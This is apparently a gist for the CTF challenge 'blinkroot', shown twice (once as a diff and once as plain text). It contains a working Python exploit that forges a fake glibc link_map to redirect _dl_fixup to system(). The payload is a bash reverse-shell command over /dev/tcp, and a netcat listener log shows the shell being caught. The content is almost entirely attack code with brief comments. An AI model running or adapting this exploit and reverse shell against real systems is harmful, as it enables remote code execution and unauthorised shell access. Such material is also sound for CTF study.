inaz2 · April 19, 2017 05:30
diff --git a/gistfile1.txt b/gistfile1.txt
 $ nc -v -l 4444
 Listening on [0.0.0.0] (family 0, port 4444)
 Connection from [127.0.0.1] port 4444 [tcp/*] accepted (family 2, sport 50250)
 id
 uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
diff --git a/test.py b/test.py
 from minipwn import *

 s = connect_process(['./blinkroot_b872f15bde9878674eb8d46809a6c8564c7c1280'])

 addr_data = 0x600bc0
 got_linkmap = 0x600b40
 got_libc_start = 0x600b80
 offset_libc_start = 0x20740
 offset_system = 0x45390

 addr_fake_linkmap = addr_data + 0x50
 delta = offset_system - offset_libc_start

 """
 let _dl_fixup() return (*got_libc_start + delta) by using fake linkmap

 https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-runtime.c;h=92596acf996725eda2939b838091317fea54e507;hb=ab30899d880f9741a409cbc0d7a28399bdac21bf

  59 DL_FIXUP_VALUE_TYPE
  60 attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
  61 _dl_fixup (
  62 # ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
  63            ELF_MACHINE_RUNTIME_FIXUP_ARGS,
  64 # endif
  65            struct link_map *l, ElfW(Word) reloc_arg)
  66 {
 ...
 133       value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
 ...
 148   return elf_machine_fixup_plt (l, result, reloc, rel_addr, value);
 149 }

 https://sourceware.org/git/?p=glibc.git;a=blob;f=sysdeps/generic/dl-lookupcfg.h;h=3ac1f468698c24828c83367cc18cdc5db9546216;hb=ab30899d880f9741a409cbc0d7a28399bdac21bf

  23 #define DL_FIXUP_MAKE_VALUE(map, addr) (addr)
 """

 """
  40059d:       48 8b 05 1c 06 20 00    mov    rax,QWORD PTR [rip+0x20061c]        # 600bc0 <data>
  4005a4:       48 c7 04 24 10 00 00    mov    QWORD PTR [rsp],0x10
  4005ab:       00
  4005ac:       be c8 0b 60 00          mov    esi,0x600bc8
  4005b1:       48 8d 90 c0 0b 60 00    lea    rdx,[rax+0x600bc0]
  4005b8:       0f 12 04 24             movlps xmm0,QWORD PTR [rsp]
  4005bc:       0f 16 06                movhps xmm0,QWORD PTR [rsi]
  4005bf:       0f 29 02                movaps XMMWORD PTR [rdx],xmm0
  4005c2:       bf d0 0b 60 00          mov    edi,0x600bd0
  4005c7:       e8 24 ff ff ff          call   4004f0 <puts@plt>
 """

 buf = struct.pack('<q', got_linkmap-addr_data)                           # 0x600bc0: index (got_linkmap)
 buf += p64(addr_fake_linkmap)                                            # 0x600bc8: value (addr_fake_linkmap)
 buf += 'bash -c "sh </dev/tcp/127.0.0.1/4444 >&0 2>&0"\x00'.ljust(0x40)  # 0x600bd0: 1st arg of puts() (bash reverse shell)
 # addr_fake_linkmap
 buf += p64(delta)                        # l->l_addr == delta
 buf += 'A' * 8
 buf += p64(addr_fake_linkmap+0x20-0x18)  # (4)
 buf += p64(got_libc_start-8)             # sym->st_value == *got_libc_start
 buf += p64(addr_fake_linkmap-delta)      # reloc->r_offset
 buf += p64(7)                            # reloc->r_info == 7
 buf += 'A' * 0x38
 buf += p64(addr_fake_linkmap)            # (1)
 buf += p64(addr_fake_linkmap+0x10)       # (3)
 buf += 'A' * 0x80
 buf += p64(addr_fake_linkmap+0x8)        # (2)
 buf = buf.ljust(0x400)

 s.sendall(buf)

 interact(s)
	$ nc -v -l 4444
	Listening on [0.0.0.0] (family 0, port 4444)
	Connection from [127.0.0.1] port 4444 [tcp/*] accepted (family 2, sport 50250)
	id
	uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
	from minipwn import *

	s = connect_process(['./blinkroot_b872f15bde9878674eb8d46809a6c8564c7c1280'])

	addr_data = 0x600bc0
	got_linkmap = 0x600b40
	got_libc_start = 0x600b80
	offset_libc_start = 0x20740
	offset_system = 0x45390

	addr_fake_linkmap = addr_data + 0x50
	delta = offset_system - offset_libc_start

	"""
	let _dl_fixup() return (*got_libc_start + delta) by using fake linkmap

	https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-runtime.c;h=92596acf996725eda2939b838091317fea54e507;hb=ab30899d880f9741a409cbc0d7a28399bdac21bf

	59 DL_FIXUP_VALUE_TYPE
	60 attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
	61 _dl_fixup (
	62 # ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
	63 ELF_MACHINE_RUNTIME_FIXUP_ARGS,
	64 # endif
	65 struct link_map *l, ElfW(Word) reloc_arg)
	66 {
	...
	133 value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
	...
	148 return elf_machine_fixup_plt (l, result, reloc, rel_addr, value);
	149 }

	https://sourceware.org/git/?p=glibc.git;a=blob;f=sysdeps/generic/dl-lookupcfg.h;h=3ac1f468698c24828c83367cc18cdc5db9546216;hb=ab30899d880f9741a409cbc0d7a28399bdac21bf

	23 #define DL_FIXUP_MAKE_VALUE(map, addr) (addr)
	"""

	"""
	40059d: 48 8b 05 1c 06 20 00 mov rax,QWORD PTR [rip+0x20061c] # 600bc0 <data>
	4005a4: 48 c7 04 24 10 00 00 mov QWORD PTR [rsp],0x10
	4005ab: 00
	4005ac: be c8 0b 60 00 mov esi,0x600bc8
	4005b1: 48 8d 90 c0 0b 60 00 lea rdx,[rax+0x600bc0]
	4005b8: 0f 12 04 24 movlps xmm0,QWORD PTR [rsp]
	4005bc: 0f 16 06 movhps xmm0,QWORD PTR [rsi]
	4005bf: 0f 29 02 movaps XMMWORD PTR [rdx],xmm0
	4005c2: bf d0 0b 60 00 mov edi,0x600bd0
	4005c7: e8 24 ff ff ff call 4004f0 <puts@plt>
	"""

	buf = struct.pack('<q', got_linkmap-addr_data) # 0x600bc0: index (got_linkmap)
	buf += p64(addr_fake_linkmap) # 0x600bc8: value (addr_fake_linkmap)
	buf += 'bash -c "sh </dev/tcp/127.0.0.1/4444 >&0 2>&0"\x00'.ljust(0x40) # 0x600bd0: 1st arg of puts() (bash reverse shell)
	# addr_fake_linkmap
	buf += p64(delta) # l->l_addr == delta
	buf += 'A' * 8
	buf += p64(addr_fake_linkmap+0x20-0x18) # (4)
	buf += p64(got_libc_start-8) # sym->st_value == *got_libc_start
	buf += p64(addr_fake_linkmap-delta) # reloc->r_offset
	buf += p64(7) # reloc->r_info == 7
	buf += 'A' * 0x38
	buf += p64(addr_fake_linkmap) # (1)
	buf += p64(addr_fake_linkmap+0x10) # (3)
	buf += 'A' * 0x80
	buf += p64(addr_fake_linkmap+0x8) # (2)
	buf = buf.ljust(0x400)

	s.sendall(buf)

	interact(s)